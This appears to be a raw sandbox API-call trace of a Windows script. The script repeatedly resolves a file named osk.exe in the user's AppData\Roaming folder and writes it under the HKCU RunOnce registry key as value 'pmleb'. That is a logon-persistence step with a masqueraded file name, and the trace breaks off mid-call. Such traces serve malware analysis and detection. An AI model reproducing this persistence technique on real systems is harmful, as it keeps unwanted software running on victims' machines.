FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a45710*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x33ef44 | out: ppvObject=0x33ef44*=0x2b53cec) returned 0x0 [0078.382] FileSystemObject:IUnknown:Release (This=0x2b53cec) returned 0x1e [0078.382] FileSystemObject:IDispatch:GetIDsOfNames (in: This=0x2b53cec, riid=0x74a40bb4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x33f0ac*="Path", cNames=0x1, lcid=0x409, rgDispId=0x33f0d0 | out: rgDispId=0x33f0d0*=0) returned 0x0 [0078.382] FileSystemObject:IUnknown:AddRef (This=0x2b53cec) returned 0x1f [0078.382] FileSystemObject:IDispatch:Invoke (in: This=0x2b53cec, dispIdMember=0, riid=0x74a40bb4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, 
[7]=0x0)), lcid=0x409, wFlags=0x2, pDispParams=0x33f074*(rgvarg=0x0, rgdispidNamedArgs=0x0, cArgs=0x0, cNamedArgs=0x0), pVarResult=0x2b53840, pExcepInfo=0x33f088, puArgErr=0x33f084 | out: pDispParams=0x33f074*(rgvarg=0x0, rgdispidNamedArgs=0x0, cArgs=0x0, cNamedArgs=0x0), pVarResult=0x2b53840*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\osk.exe"), varVal2=0x0), pExcepInfo=0x33f088*(wCode=0x0, wReserved=0x0, bstrSource=0x0, bstrDescription=0x0, bstrHelpFile=0x0, dwHelpContext=0x0, pvReserved=0x0, pfnDeferredFillIn=0x0, scode=0x0), puArgErr=0x33f084*=0x2b53cec) returned 0x0 [0078.382] FileSystemObject:IUnknown:Release (This=0x2b53cec) returned 0x1e [0078.382] IUnknown:AddRef (This=0x7a9740) returned 0x2 [0078.382] ITypeInfo:LocalGetIDsOfNames (This=0x7a9740) returned 0x0 [0078.382] IUnknown:Release (This=0x7a9740) returned 0x1 [0078.383] IUnknown:AddRef (This=0x7a9740) returned 0x2 [0078.383] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0 [0078.383] ITypeInfo:LocalInvoke (This=0x7a9740) returned 0x0 [0078.383] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce\\pmleb", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 61 [0078.383] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce\\pmleb", cchWideChar=-1, lpMultiByteStr=0x33ec50, cbMultiByte=61, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce\\pmleb", lpUsedDefaultChar=0x0) returned 61 [0078.383] _mbsnbcmp (_Str1=0x33ec50, _Str2=0x74a021e8, _MaxCount=0x5) returned 0 [0078.383] RegCreateKeyExA (in: hKey=0x80000001, 
lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x33ec28, lpdwDisposition=0x0 | out: phkResult=0x33ec28*=0x280, lpdwDisposition=0x0) returned 0x0 [0078.383] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 54 [0078.383] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cchWideChar=-1, lpMultiByteStr=0x33ec10, cbMultiByte=54, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", lpUsedDefaultChar=0x0) returned 54 [0078.383] lstrlenA (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 53 [0078.383] RegSetValueExA (in: hKey=0x280, lpValueName="pmleb", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cbData=0x36 | out: lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 0x0 [0078.383] RegCloseKey (hKey=0x280) returned 0x0 [0078.383] IUnknown:Release (This=0x7a9740) returned 0x1 [0078.383] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0078.384] SetTimer (hWnd=0x20280, nIDEvent=0x201e, uElapse=0xa, lpTimerFunc=0x0) returned 0x201e [0078.384] GetMessageW (in: lpMsg=0x33f7fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x33f7fc) returned 1 [0078.397] TranslateMessage (lpMsg=0x33f7fc) returned 0 [0078.397] DispatchMessageW (lpMsg=0x33f7fc) returned 0x0 [0078.397] KillTimer (hWnd=0x20280, uIDEvent=0x201e) returned 1 [0078.397] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0078.397] CoGetObjectContext (in: riid=0x74a40270*(Data1=0x0, Data2=0x0, 
Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x33f3b0 | out: ppv=0x33f3b0*=0x787518) returned 0x0 [0078.397] IUnknown:Release (This=0x787518) returned 0x1 [0078.397] FileSystemObject:IDispatch:GetIDsOfNames (in: This=0x2b53a00, riid=0x74a40bb4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x33f02c*="GetFile", cNames=0x1, lcid=0x409, rgDispId=0x33f050 | out: rgDispId=0x33f050*=10012) returned 0x0 [0078.397] FileSystemObject:IUnknown:AddRef (This=0x2b53a00) returned 0x2 [0078.397] FileSystemObject:IDispatch:Invoke (in: This=0x2b53a00, dispIdMember=10012, riid=0x74a40bb4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), lcid=0x409, wFlags=0x3, pDispParams=0x33eff4*(rgvarg=([0]=0x33ef98*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="osk.exe", varVal2=0x1113d0)), rgdispidNamedArgs=0x0, cArgs=0x1, cNamedArgs=0x0), pVarResult=0x33f228, pExcepInfo=0x33f008, puArgErr=0x33f004 | out: pDispParams=0x33eff4*(rgvarg=([0]=0x33ef98*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="osk.exe", varVal2=0x1113d0)), rgdispidNamedArgs=0x0, cArgs=0x1, cNamedArgs=0x0), pVarResult=0x33f228*(varType=0x9, wReserved1=0x0, wReserved2=0xf288, wReserved3=0x33, varVal1=0x2b53cec, varVal2=0x0), pExcepInfo=0x33f008*(wCode=0x0, wReserved=0x0, bstrSource=0x0, bstrDescription=0x0, bstrHelpFile=0x0, dwHelpContext=0x0, pvReserved=0x0, pfnDeferredFillIn=0x0, scode=0x0), puArgErr=0x33f004*=0x2b53a00) returned 0x0 [0078.398] FileSystemObject:IUnknown:Release (This=0x2b53a00) returned 0x1 [0078.398] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a45700*(Data1=0x9bcb0016, Data2=0xbc2a, Data3=0x47b7, Data4=([0]=0x81, [1]=0x54, [2]=0x85, [3]=0x80, [4]=0xa1, [5]=0x5c, [6]=0x3f, [7]=0xf0)), ppvObject=0x33ef54 | out: ppvObject=0x33ef54*=0x0) returned 
0x80004002 [0078.398] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a455f8*(Data1=0x719c3050, Data2=0xf9d3, Data3=0x11cf, Data4=([0]=0xa4, [1]=0x93, [2]=0x0, [3]=0x40, [4]=0x5, [5]=0x23, [6]=0xa8, [7]=0xa0)), ppvObject=0x33ef50 | out: ppvObject=0x33ef50*=0x0) returned 0x80004002 [0078.398] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a45608*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x33ef4c | out: ppvObject=0x33ef4c*=0x0) returned 0x80004002 [0078.398] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a45764*(Data1=0xa0aac450, Data2=0xa77b, Data3=0x11cf, Data4=([0]=0x91, [1]=0xd0, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0xc1, [6]=0x4a, [7]=0x7c)), ppvObject=0x33ef48 | out: ppvObject=0x33ef48*=0x0) returned 0x80004002 [0078.398] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a45710*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x33ef44 | out: ppvObject=0x33ef44*=0x2b53cec) returned 0x0 [0078.398] FileSystemObject:IUnknown:Release (This=0x2b53cec) returned 0x1f [0078.398] FileSystemObject:IDispatch:GetIDsOfNames (in: This=0x2b53cec, riid=0x74a40bb4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x33f0ac*="Path", cNames=0x1, lcid=0x409, rgDispId=0x33f0d0 | out: rgDispId=0x33f0d0*=0) returned 0x0 [0078.398] FileSystemObject:IUnknown:AddRef (This=0x2b53cec) returned 0x20 [0078.398] FileSystemObject:IDispatch:Invoke (in: This=0x2b53cec, dispIdMember=0, riid=0x74a40bb4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), lcid=0x409, wFlags=0x2, pDispParams=0x33f074*(rgvarg=0x0, rgdispidNamedArgs=0x0, cArgs=0x0, cNamedArgs=0x0), pVarResult=0x2b53840, 
pExcepInfo=0x33f088, puArgErr=0x33f084 | out: pDispParams=0x33f074*(rgvarg=0x0, rgdispidNamedArgs=0x0, cArgs=0x0, cNamedArgs=0x0), pVarResult=0x2b53840*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\osk.exe"), varVal2=0x0), pExcepInfo=0x33f088*(wCode=0x0, wReserved=0x0, bstrSource=0x0, bstrDescription=0x0, bstrHelpFile=0x0, dwHelpContext=0x0, pvReserved=0x0, pfnDeferredFillIn=0x0, scode=0x0), puArgErr=0x33f084*=0x2b53cec) returned 0x0 [0078.399] FileSystemObject:IUnknown:Release (This=0x2b53cec) returned 0x1f [0078.399] IUnknown:AddRef (This=0x7a9740) returned 0x2 [0078.399] ITypeInfo:LocalGetIDsOfNames (This=0x7a9740) returned 0x0 [0078.399] IUnknown:Release (This=0x7a9740) returned 0x1 [0078.399] IUnknown:AddRef (This=0x7a9740) returned 0x2 [0078.399] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0 [0078.399] ITypeInfo:LocalInvoke (This=0x7a9740) returned 0x0 [0078.399] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce\\pmleb", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 61 [0078.399] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce\\pmleb", cchWideChar=-1, lpMultiByteStr=0x33ec50, cbMultiByte=61, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce\\pmleb", lpUsedDefaultChar=0x0) returned 61 [0078.399] _mbsnbcmp (_Str1=0x33ec50, _Str2=0x74a021e8, _MaxCount=0x5) returned 0 [0078.399] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, 
phkResult=0x33ec28, lpdwDisposition=0x0 | out: phkResult=0x33ec28*=0x280, lpdwDisposition=0x0) returned 0x0 [0078.399] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 54 [0078.399] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cchWideChar=-1, lpMultiByteStr=0x33ec10, cbMultiByte=54, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", lpUsedDefaultChar=0x0) returned 54 [0078.399] lstrlenA (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 53 [0078.399] RegSetValueExA (in: hKey=0x280, lpValueName="pmleb", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cbData=0x36 | out: lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 0x0 [0078.399] RegCloseKey (hKey=0x280) returned 0x0 [0078.400] IUnknown:Release (This=0x7a9740) returned 0x1 [0078.400] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0078.400] SetTimer (hWnd=0x20280, nIDEvent=0x201f, uElapse=0xa, lpTimerFunc=0x0) returned 0x201f [0078.400] GetMessageW (in: lpMsg=0x33f7fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x33f7fc) returned 1 [0078.411] TranslateMessage (lpMsg=0x33f7fc) returned 0 [0078.411] DispatchMessageW (lpMsg=0x33f7fc) returned 0x0 [0078.411] KillTimer (hWnd=0x20280, uIDEvent=0x201f) returned 1 [0078.411] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0078.411] CoGetObjectContext (in: riid=0x74a40270*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x33f3b0 | out: ppv=0x33f3b0*=0x787518) returned 0x0 
[0078.412] IUnknown:Release (This=0x787518) returned 0x1 [0078.412] FileSystemObject:IDispatch:GetIDsOfNames (in: This=0x2b53a00, riid=0x74a40bb4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x33f02c*="GetFile", cNames=0x1, lcid=0x409, rgDispId=0x33f050 | out: rgDispId=0x33f050*=10012) returned 0x0 [0078.412] FileSystemObject:IUnknown:AddRef (This=0x2b53a00) returned 0x2 [0078.412] FileSystemObject:IDispatch:Invoke (in: This=0x2b53a00, dispIdMember=10012, riid=0x74a40bb4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), lcid=0x409, wFlags=0x3, pDispParams=0x33eff4*(rgvarg=([0]=0x33ef98*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="osk.exe", varVal2=0x1113d0)), rgdispidNamedArgs=0x0, cArgs=0x1, cNamedArgs=0x0), pVarResult=0x33f228, pExcepInfo=0x33f008, puArgErr=0x33f004 | out: pDispParams=0x33eff4*(rgvarg=([0]=0x33ef98*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="osk.exe", varVal2=0x1113d0)), rgdispidNamedArgs=0x0, cArgs=0x1, cNamedArgs=0x0), pVarResult=0x33f228*(varType=0x9, wReserved1=0x0, wReserved2=0xf288, wReserved3=0x33, varVal1=0x2b53cec, varVal2=0x0), pExcepInfo=0x33f008*(wCode=0x0, wReserved=0x0, bstrSource=0x0, bstrDescription=0x0, bstrHelpFile=0x0, dwHelpContext=0x0, pvReserved=0x0, pfnDeferredFillIn=0x0, scode=0x0), puArgErr=0x33f004*=0x2b53a00) returned 0x0 [0078.412] FileSystemObject:IUnknown:Release (This=0x2b53a00) returned 0x1 [0078.412] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a45700*(Data1=0x9bcb0016, Data2=0xbc2a, Data3=0x47b7, Data4=([0]=0x81, [1]=0x54, [2]=0x85, [3]=0x80, [4]=0xa1, [5]=0x5c, [6]=0x3f, [7]=0xf0)), ppvObject=0x33ef54 | out: ppvObject=0x33ef54*=0x0) returned 0x80004002 [0078.412] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a455f8*(Data1=0x719c3050, Data2=0xf9d3, Data3=0x11cf, 
Data4=([0]=0xa4, [1]=0x93, [2]=0x0, [3]=0x40, [4]=0x5, [5]=0x23, [6]=0xa8, [7]=0xa0)), ppvObject=0x33ef50 | out: ppvObject=0x33ef50*=0x0) returned 0x80004002 [0078.412] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a45608*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x33ef4c | out: ppvObject=0x33ef4c*=0x0) returned 0x80004002 [0078.412] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a45764*(Data1=0xa0aac450, Data2=0xa77b, Data3=0x11cf, Data4=([0]=0x91, [1]=0xd0, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0xc1, [6]=0x4a, [7]=0x7c)), ppvObject=0x33ef48 | out: ppvObject=0x33ef48*=0x0) returned 0x80004002 [0078.412] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a45710*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x33ef44 | out: ppvObject=0x33ef44*=0x2b53cec) returned 0x0 [0078.412] FileSystemObject:IUnknown:Release (This=0x2b53cec) returned 0x20 [0078.412] FileSystemObject:IDispatch:GetIDsOfNames (in: This=0x2b53cec, riid=0x74a40bb4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x33f0ac*="Path", cNames=0x1, lcid=0x409, rgDispId=0x33f0d0 | out: rgDispId=0x33f0d0*=0) returned 0x0 [0078.412] FileSystemObject:IUnknown:AddRef (This=0x2b53cec) returned 0x21 [0078.412] FileSystemObject:IDispatch:Invoke (in: This=0x2b53cec, dispIdMember=0, riid=0x74a40bb4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), lcid=0x409, wFlags=0x2, pDispParams=0x33f074*(rgvarg=0x0, rgdispidNamedArgs=0x0, cArgs=0x0, cNamedArgs=0x0), pVarResult=0x2b53840, pExcepInfo=0x33f088, puArgErr=0x33f084 | out: pDispParams=0x33f074*(rgvarg=0x0, rgdispidNamedArgs=0x0, cArgs=0x0, cNamedArgs=0x0), 
pVarResult=0x2b53840*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\osk.exe"), varVal2=0x0), pExcepInfo=0x33f088*(wCode=0x0, wReserved=0x0, bstrSource=0x0, bstrDescription=0x0, bstrHelpFile=0x0, dwHelpContext=0x0, pvReserved=0x0, pfnDeferredFillIn=0x0, scode=0x0), puArgErr=0x33f084*=0x2b53cec) returned 0x0 [0078.413] FileSystemObject:IUnknown:Release (This=0x2b53cec) returned 0x20 [0078.413] IUnknown:AddRef (This=0x7a9740) returned 0x2 [0078.413] ITypeInfo:LocalGetIDsOfNames (This=0x7a9740) returned 0x0 [0078.413] IUnknown:Release (This=0x7a9740) returned 0x1 [0078.413] IUnknown:AddRef (This=0x7a9740) returned 0x2 [0078.413] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0 [0078.413] ITypeInfo:LocalInvoke (This=0x7a9740) returned 0x0 [0078.413] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce\\pmleb", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 61 [0078.413] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce\\pmleb", cchWideChar=-1, lpMultiByteStr=0x33ec50, cbMultiByte=61, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce\\pmleb", lpUsedDefaultChar=0x0) returned 61 [0078.413] _mbsnbcmp (_Str1=0x33ec50, _Str2=0x74a021e8, _MaxCount=0x5) returned 0 [0078.413] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x33ec28, lpdwDisposition=0x0 | out: phkResult=0x33ec28*=0x280, lpdwDisposition=0x0) returned 0x0 [0078.414] WideCharToMultiByte (in: 
CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 54 [0078.414] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cchWideChar=-1, lpMultiByteStr=0x33ec10, cbMultiByte=54, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", lpUsedDefaultChar=0x0) returned 54 [0078.414] lstrlenA (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 53 [0078.414] RegSetValueExA (in: hKey=0x280, lpValueName="pmleb", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cbData=0x36 | out: lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 0x0 [0078.414] RegCloseKey (hKey=0x280) returned 0x0 [0078.414] IUnknown:Release (This=0x7a9740) returned 0x1 [0078.414] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0078.414] SetTimer (hWnd=0x20280, nIDEvent=0x2020, uElapse=0xa, lpTimerFunc=0x0) returned 0x2020 [0078.414] GetMessageW (in: lpMsg=0x33f7fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x33f7fc) returned 1 [0078.438] TranslateMessage (lpMsg=0x33f7fc) returned 0 [0078.438] DispatchMessageW (lpMsg=0x33f7fc) returned 0x0 [0078.438] KillTimer (hWnd=0x20280, uIDEvent=0x2020) returned 1 [0078.438] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0078.438] CoGetObjectContext (in: riid=0x74a40270*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x33f3b0 | out: ppv=0x33f3b0*=0x787518) returned 0x0 [0078.438] IUnknown:Release (This=0x787518) returned 0x1 [0078.438] FileSystemObject:IDispatch:GetIDsOfNames (in: This=0x2b53a00, 
riid=0x74a40bb4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x33f02c*="GetFile", cNames=0x1, lcid=0x409, rgDispId=0x33f050 | out: rgDispId=0x33f050*=10012) returned 0x0 [0078.438] FileSystemObject:IUnknown:AddRef (This=0x2b53a00) returned 0x2 [0078.439] FileSystemObject:IDispatch:Invoke (in: This=0x2b53a00, dispIdMember=10012, riid=0x74a40bb4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), lcid=0x409, wFlags=0x3, pDispParams=0x33eff4*(rgvarg=([0]=0x33ef98*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="osk.exe", varVal2=0x1113d0)), rgdispidNamedArgs=0x0, cArgs=0x1, cNamedArgs=0x0), pVarResult=0x33f228, pExcepInfo=0x33f008, puArgErr=0x33f004 | out: pDispParams=0x33eff4*(rgvarg=([0]=0x33ef98*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="osk.exe", varVal2=0x1113d0)), rgdispidNamedArgs=0x0, cArgs=0x1, cNamedArgs=0x0), pVarResult=0x33f228*(varType=0x9, wReserved1=0x0, wReserved2=0xf288, wReserved3=0x33, varVal1=0x2b53cec, varVal2=0x0), pExcepInfo=0x33f008*(wCode=0x0, wReserved=0x0, bstrSource=0x0, bstrDescription=0x0, bstrHelpFile=0x0, dwHelpContext=0x0, pvReserved=0x0, pfnDeferredFillIn=0x0, scode=0x0), puArgErr=0x33f004*=0x2b53a00) returned 0x0 [0078.439] FileSystemObject:IUnknown:Release (This=0x2b53a00) returned 0x1 [0078.439] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a45700*(Data1=0x9bcb0016, Data2=0xbc2a, Data3=0x47b7, Data4=([0]=0x81, [1]=0x54, [2]=0x85, [3]=0x80, [4]=0xa1, [5]=0x5c, [6]=0x3f, [7]=0xf0)), ppvObject=0x33ef54 | out: ppvObject=0x33ef54*=0x0) returned 0x80004002 [0078.439] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a455f8*(Data1=0x719c3050, Data2=0xf9d3, Data3=0x11cf, Data4=([0]=0xa4, [1]=0x93, [2]=0x0, [3]=0x40, [4]=0x5, [5]=0x23, [6]=0xa8, [7]=0xa0)), ppvObject=0x33ef50 | out: 
